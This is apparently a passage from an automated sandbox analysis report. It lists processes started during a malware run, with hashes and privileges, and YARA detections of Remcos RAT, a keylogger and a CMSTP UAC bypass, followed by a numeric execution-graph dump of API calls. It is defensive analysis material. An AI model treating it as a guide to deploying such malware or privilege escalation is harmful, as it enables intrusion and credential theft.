                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'278'464 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:80FB2A9AB41BBA2E660763723BD5C683
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:04
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.1959006729.0000000000822000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:06
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'235'968 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:8A50E57282AB78C6D3930BA31E2E66D7
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:07
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'150'976 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:39B7A38B4D293A74193E0AFFD1CF7BBC
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:08
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'141'248 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1668426D4049F247816A6509230B04D6
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:10
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'846'784 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:39A4234D5B8BA6534DB70A8421277A62
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:10
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'146'880 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:77032644518A6E344DB3C45614BB3462
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:11
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:B90A4BF24B298B6114E19987A67C9450
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:12
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'511'424 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:528551BC5915FF99C29746E159C1E483
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:13
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:022EEAB6B3A6A0E570E90A480C9C1AEB
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:14
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'801'216 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:085BAFAFBBA6343A8BA8B383CB55A16F
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:15
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'303'552 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:FD669AD0BA373802EC20BC543357973C
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:17
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:2'164'736 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:C9F70CE234FCA9526C1C5BFCDAF44E2B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                Execution Coverage:4.3%
                                                                                                                                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                                                                                                                                                                                                                                Signature Coverage:8.8%
                                                                                                                                                                                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:36
                                                                                                                                                                                                                                                                                                                                                                                                                                execution_graph 65300 4010e0 65303 401100 65300->65303 65302 4010f8 65304 401113 65303->65304 65305 401184 65304->65305 65306 40114c 65304->65306 65314 401120 65304->65314 65337 401182 65304->65337 65341 401250 61 API calls __wctomb_s_l 65305->65341 65308 401151 65306->65308 65309 40119d 65306->65309 65307 40112c DefWindowProcW 65307->65302 65312 401219 65308->65312 65313 40115d 65308->65313 65311 42afb4 65309->65311 65316 4011a3 65309->65316 65343 40f190 10 API calls 65311->65343 65312->65314 65319 401225 65312->65319 65317 401163 65313->65317 65318 42b01d 65313->65318 65314->65307 65348 401000 Shell_NotifyIconW __wctomb_s_l 65314->65348 65315 401193 65315->65302 65316->65314 65322 4011b6 KillTimer 65316->65322 65323 4011db SetTimer RegisterWindowMessageW 65316->65323 65324 42afe9 65317->65324 65325 40116c 65317->65325 65318->65307 65347 4370f4 52 API calls 65318->65347 65359 468b0e 74 API calls __wctomb_s_l 65319->65359 65342 401000 Shell_NotifyIconW __wctomb_s_l 65322->65342 65323->65315 65330 401204 CreatePopupMenu 65323->65330 65345 40f190 10 API calls 65324->65345 65325->65314 65332 401174 65325->65332 65326 42b04f 65349 40e0c0 65326->65349 65330->65302 65344 45fd57 65 API calls __wctomb_s_l 65332->65344 65334 42afe4 65334->65315 65335 42b00e 65346 401a50 331 API calls 65335->65346 65336 4011c9 PostQuitMessage 65336->65302 65337->65307 65340 42afdc 65340->65307 65340->65334 65341->65315 65342->65336 65343->65315 65344->65340 65345->65335 65346->65337 65347->65337 65348->65326 65350 40e0e7 __wctomb_s_l 65349->65350 65351 42729f DestroyIcon 65350->65351 65353 40e142 65350->65353 65351->65353 65352 40e184 65355 40e1a0 Shell_NotifyIconW 65352->65355 65356 4272db Shell_NotifyIconW 65352->65356 65353->65352 65382 4341e6 63 API calls __wcsicoll 65353->65382 65360 401b80 65355->65360 65358 40e1ba 65358->65337 65359->65334 65361 401b9c 65360->65361 65381 401c7e 65360->65381 65383 4013c0 65361->65383 65364 42722b LoadStringW 65367 427246 65364->65367 65365 401bb9 65388 402160 65365->65388 65402 40e0a0 65367->65402 65368 401bcd 65370 427258 65368->65370 65371 401bda 65368->65371 65406 40d200 52 API calls 2 library calls 65370->65406 65371->65367 65373 401be4 65371->65373 65372 401bf3 _wcscpy __wctomb_s_l _wcsncpy 65380 401c62 Shell_NotifyIconW 65372->65380 65401 40d200 52 API calls 2 library calls 65373->65401 65376 427267 65376->65372 65377 42727b 65376->65377 65407 40d200 52 API calls 2 library calls 65377->65407 65379 427289 65380->65381 65381->65358 65382->65352 65408 4115d7 65383->65408 65389 426daa 65388->65389 65390 40216b _wcslen 65388->65390 65446 40c600 65389->65446 65393 402180 65390->65393 65394 40219e 65390->65394 65392 426db5 65392->65368 65445 403bd0 52 API calls moneypunct 65393->65445 65396 4013a0 52 API calls 65394->65396 65398 4021a5 65396->65398 65397 402187 _memmove 65397->65368 65399 426db7 65398->65399 65400 4115d7 52 API calls 65398->65400 65400->65397 65401->65372 65403 40e0b2 65402->65403 65404 40e0a8 65402->65404 65403->65372 65452 403c30 52 API calls _memmove 65404->65452 65406->65376 65407->65379 65410 4115e1 _malloc 65408->65410 65411 4013e4 65410->65411 65415 4115fd std::exception::exception 65410->65415 65422 4135bb 65410->65422 65419 4013a0 65411->65419 65412 41163b 65437 4180af 46 API calls std::exception::operator= 65412->65437 65414 411645 65438 418105 RaiseException 65414->65438 65415->65412 65436 41130a 51 API calls __cinit 65415->65436 65418 411656 65420 4115d7 52 API calls 65419->65420 65421 4013a7 65420->65421 65421->65364 65421->65365 65423 413638 _malloc 65422->65423 65429 4135c9 _malloc 65422->65429 65444 417f77 46 API calls __getptd_noexit 65423->65444 65426 4135f7 RtlAllocateHeap 65426->65429 65435 413630 65426->65435 65428 413624 65442 417f77 46 API calls __getptd_noexit 65428->65442 65429->65426 65429->65428 65430 4135d4 65429->65430 65433 413622 65429->65433 65430->65429 65439 418901 46 API calls __NMSG_WRITE 65430->65439 65440 418752 46 API calls 6 library calls 65430->65440 65441 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 65430->65441 65443 417f77 46 API calls __getptd_noexit 65433->65443 65435->65410 65436->65412 65437->65414 65438->65418 65439->65430 65440->65430 65442->65433 65443->65435 65444->65435 65445->65397 65447 40c619 65446->65447 65448 40c60a 65446->65448 65447->65392 65448->65447 65451 4026f0 52 API calls _memmove 65448->65451 65450 426d7a _memmove 65450->65392 65451->65450 65452->65403 65453 40bd20 65454 428194 65453->65454 65455 40bd2d 65453->65455 65457 40bd43 65454->65457 65458 4281bc 65454->65458 65460 4281b2 65454->65460 65456 40bd37 65455->65456 65476 4531b1 85 API calls 5 library calls 65455->65476 65465 40bd50 65456->65465 65475 45e987 86 API calls moneypunct 65458->65475 65474 40b510 VariantClear 65460->65474 65464 4281ba 65466 426cf1 65465->65466 65467 40bd63 65465->65467 65486 44cde9 52 API calls _memmove 65466->65486 65477 40bd80 65467->65477 65470 40bd73 65470->65457 65471 426cfc 65472 40e0a0 52 API calls 65471->65472 65473 426d02 65472->65473 65474->65464 65475->65455 65476->65456 65478 40bd8e 65477->65478 65483 40bdb7 _memmove 65477->65483 65479 40bded 65478->65479 65480 40bdad 65478->65480 65478->65483 65482 4115d7 52 API calls 65479->65482 65487 402f00 65480->65487 65484 40bdf6 65482->65484 65483->65470 65484->65483 65485 4115d7 52 API calls 65484->65485 65485->65483 65486->65471 65488 402f10 65487->65488 65489 402f0c 65487->65489 65490 4115d7 52 API calls 65488->65490 65491 4268c3 65488->65491 65489->65483 65492 402f51 moneypunct _memmove 65490->65492 65492->65483 65493 425ba2 65498 40e360 65493->65498 65495 425bb4 65514 41130a 51 API calls __cinit 65495->65514 65497 425bbe 65499 4115d7 52 API calls 65498->65499 65500 40e3ec GetModuleFileNameW 65499->65500 65515 413a0e 65500->65515 65502 40e421 _wcsncat 65518 413a9e 65502->65518 65505 4115d7 52 API calls 65506 40e45e _wcscpy 65505->65506 65521 40bc70 65506->65521 65510 40e4a9 65510->65495 65511 401c90 52 API calls 65513 40e4a1 _wcscat _wcslen _wcsncpy 65511->65513 65512 4115d7 52 API calls 65512->65513 65513->65510 65513->65511 65513->65512 65514->65497 65540 413801 65515->65540 65570 419efd 65518->65570 65522 4115d7 52 API calls 65521->65522 65523 40bc98 65522->65523 65524 4115d7 52 API calls 65523->65524 65525 40bca6 65524->65525 65526 40e4c0 65525->65526 65582 403350 65526->65582 65528 40e4cb RegOpenKeyExW 65529 427190 RegQueryValueExW 65528->65529 65530 40e4eb 65528->65530 65531 4271b0 65529->65531 65532 42721a RegCloseKey 65529->65532 65530->65513 65533 4115d7 52 API calls 65531->65533 65532->65513 65534 4271cb 65533->65534 65589 43652f 52 API calls 65534->65589 65536 4271d8 RegQueryValueExW 65537 42720e 65536->65537 65538 4271f7 65536->65538 65537->65532 65539 402160 52 API calls 65538->65539 65539->65537 65541 41389e 65540->65541 65547 41381a 65540->65547 65542 4139e8 65541->65542 65544 413a00 65541->65544 65567 417f77 46 API calls __getptd_noexit 65542->65567 65569 417f77 46 API calls __getptd_noexit 65544->65569 65545 4139ed 65568 417f25 10 API calls __wcsnicmp 65545->65568 65547->65541 65555 41388a 65547->65555 65562 419e30 46 API calls __wcsnicmp 65547->65562 65550 41396c 65550->65541 65551 413967 65550->65551 65553 41397a 65550->65553 65551->65502 65552 413929 65552->65541 65554 413945 65552->65554 65564 419e30 46 API calls __wcsnicmp 65552->65564 65566 419e30 46 API calls __wcsnicmp 65553->65566 65554->65541 65554->65551 65558 41395b 65554->65558 65555->65541 65561 413909 65555->65561 65563 419e30 46 API calls __wcsnicmp 65555->65563 65565 419e30 46 API calls __wcsnicmp 65558->65565 65561->65550 65561->65552 65562->65555 65563->65561 65564->65554 65565->65551 65566->65551 65567->65545 65568->65551 65569->65551 65571 419f13 65570->65571 65572 419f0e 65570->65572 65579 417f77 46 API calls __getptd_noexit 65571->65579 65572->65571 65578 419f2b 65572->65578 65574 419f18 65580 417f25 10 API calls __wcsnicmp 65574->65580 65577 40e454 65577->65505 65578->65577 65581 417f77 46 API calls __getptd_noexit 65578->65581 65579->65574 65580->65577 65581->65574 65583 403367 65582->65583 65584 403358 65582->65584 65585 4115d7 52 API calls 65583->65585 65584->65528 65586 403370 65585->65586 65587 4115d7 52 API calls 65586->65587 65588 40339e 65587->65588 65588->65528 65589->65536 65590 416454 65627 416c70 65590->65627 65592 416460 GetStartupInfoW 65593 416474 65592->65593 65628 419d5a HeapCreate 65593->65628 65595 4164cd 65596 4164d8 65595->65596 65712 41642b 46 API calls 3 library calls 65595->65712 65629 417c20 GetModuleHandleW 65596->65629 65599 4164de 65600 4164e9 __RTC_Initialize 65599->65600 65713 41642b 46 API calls 3 library calls 65599->65713 65648 41aaa1 GetStartupInfoW 65600->65648 65604 416503 GetCommandLineW 65661 41f584 GetEnvironmentStringsW 65604->65661 65607 416513 65667 41f4d6 GetModuleFileNameW 65607->65667 65610 41651d 65611 416528 65610->65611 65715 411924 46 API calls 3 library calls 65610->65715 65671 41f2a4 65611->65671 65614 41652e 65615 416539 65614->65615 65716 411924 46 API calls 3 library calls 65614->65716 65685 411703 65615->65685 65618 416541 65620 41654c __wwincmdln 65618->65620 65717 411924 46 API calls 3 library calls 65618->65717 65689 40d6b0 65620->65689 65623 41657c 65719 411906 46 API calls _doexit 65623->65719 65626 416581 __wsopen_helper 65627->65592 65628->65595 65630 417c34 65629->65630 65631 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 65629->65631 65720 4178ff 49 API calls _free 65630->65720 65633 417c87 TlsAlloc 65631->65633 65636 417cd5 TlsSetValue 65633->65636 65637 417d96 65633->65637 65634 417c39 65634->65599 65636->65637 65638 417ce6 __init_pointers 65636->65638 65637->65599 65721 418151 InitializeCriticalSectionAndSpinCount 65638->65721 65640 417d91 65729 4178ff 49 API calls _free 65640->65729 65642 417d2a 65642->65640 65722 416b49 65642->65722 65645 417d76 65728 41793c 46 API calls 4 library calls 65645->65728 65647 417d7e GetCurrentThreadId 65647->65637 65649 416b49 __calloc_crt 46 API calls 65648->65649 65658 41aabf 65649->65658 65650 41ac6a GetStdHandle 65655 41ac34 65650->65655 65651 416b49 __calloc_crt 46 API calls 65651->65658 65652 41acce SetHandleCount 65660 4164f7 65652->65660 65653 41abb4 65653->65655 65656 41abe0 GetFileType 65653->65656 65657 41abeb InitializeCriticalSectionAndSpinCount 65653->65657 65654 41ac7c GetFileType 65654->65655 65655->65650 65655->65652 65655->65654 65659 41aca2 InitializeCriticalSectionAndSpinCount 65655->65659 65656->65653 65656->65657 65657->65653 65657->65660 65658->65651 65658->65653 65658->65655 65658->65660 65659->65655 65659->65660 65660->65604 65714 411924 46 API calls 3 library calls 65660->65714 65662 41f595 65661->65662 65663 41f599 65661->65663 65662->65607 65739 416b04 65663->65739 65665 41f5bb _memmove 65666 41f5c2 FreeEnvironmentStringsW 65665->65666 65666->65607 65668 41f50b _wparse_cmdline 65667->65668 65669 416b04 __malloc_crt 46 API calls 65668->65669 65670 41f54e _wparse_cmdline 65668->65670 65669->65670 65670->65610 65672 41f2bc _wcslen 65671->65672 65676 41f2b4 65671->65676 65673 416b49 __calloc_crt 46 API calls 65672->65673 65678 41f2e0 _wcslen 65673->65678 65674 41f336 65746 413748 65674->65746 65676->65614 65677 416b49 __calloc_crt 46 API calls 65677->65678 65678->65674 65678->65676 65678->65677 65679 41f35c 65678->65679 65682 41f373 65678->65682 65745 41ef12 46 API calls __wcsnicmp 65678->65745 65680 413748 _free 46 API calls 65679->65680 65680->65676 65752 417ed3 65682->65752 65684 41f37f 65684->65614 65686 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 65685->65686 65688 411750 __IsNonwritableInCurrentImage 65686->65688 65771 41130a 51 API calls __cinit 65686->65771 65688->65618 65690 42e2f3 65689->65690 65691 40d6cc 65689->65691 65772 408f40 65691->65772 65693 40d707 65776 40ebb0 65693->65776 65696 40d737 65779 411951 65696->65779 65701 40d751 65791 40f4e0 SystemParametersInfoW SystemParametersInfoW 65701->65791 65703 40d75f 65792 40d590 GetCurrentDirectoryW 65703->65792 65705 40d767 SystemParametersInfoW 65706 40d794 65705->65706 65707 40d78d FreeLibrary 65705->65707 65708 408f40 VariantClear 65706->65708 65707->65706 65709 40d79d 65708->65709 65710 408f40 VariantClear 65709->65710 65711 40d7a6 65710->65711 65711->65623 65718 4118da 46 API calls _doexit 65711->65718 65712->65596 65713->65600 65718->65623 65719->65626 65720->65634 65721->65642 65724 416b52 65722->65724 65725 416b8f 65724->65725 65726 416b70 Sleep 65724->65726 65730 41f677 65724->65730 65725->65640 65725->65645 65727 416b85 65726->65727 65727->65724 65727->65725 65728->65647 65729->65637 65731 41f683 65730->65731 65736 41f69e _malloc 65730->65736 65732 41f68f 65731->65732 65731->65736 65738 417f77 46 API calls __getptd_noexit 65732->65738 65733 41f6b1 HeapAlloc 65735 41f6d8 65733->65735 65733->65736 65735->65724 65736->65733 65736->65735 65737 41f694 65737->65724 65738->65737 65742 416b0d 65739->65742 65740 4135bb _malloc 45 API calls 65740->65742 65741 416b43 